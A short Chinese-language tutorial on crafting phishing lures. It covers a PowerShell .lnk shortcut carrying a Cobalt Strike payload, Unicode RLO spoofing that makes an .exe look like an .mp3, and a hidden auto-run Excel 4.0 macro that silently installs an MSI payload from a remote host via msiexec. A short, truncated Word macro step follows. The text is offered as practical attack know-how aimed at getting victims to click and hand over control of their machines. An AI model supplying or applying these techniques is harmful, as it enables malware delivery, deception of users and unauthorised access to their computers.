钓鱼攻击

一种应用较为广泛的一种攻击方式

lnk快捷方式

1、新建一个快捷方式

位置输入C:\Windows\System32\WindowsPowerShell\v1.0\

（powershell的所在位置的文件目录）

\n

后面再加上cs生成的payload

2、取一个方便操作的名字

3、更改图标

右键属性——更改图标——在 %SystemRoot%\System32\shell32.dll 这个位置下可以找到许多的系统图标

依旧选择一个方便操作的

被点击后即可上线

unicode字符伪装

用于伪装exe文件，降低在人眼中的敏感度

例如这有一个 hh.exe

添加一个正常常见的格式后缀如 .mp3

haha.exe.mp3

将后缀反写后复制 3pm.exe

删掉后缀——右键 插入Unicode控制字符——选择RLO——复制3pm.exe

后缀看上去是mp3，其实还是exe格式的文件

诱导点击即可上线

Excel

1、打开excel，右键sheet选择插入宏表

2、在A1输入**=EXEC(“msiexec/q /i http://xxx.xxx.xxx.xxx/name.msi")**，后面为你在msf生成的payload

A2输入**=HALT()**

选择整个A列，将头名改为 Aotu_open，回车保存

3、最后右键将宏隐藏，保存为启用宏的文件

2、创建一个宏

3、在ThisDocument中复制cs生成的payload

4、最后保存为启用宏的文件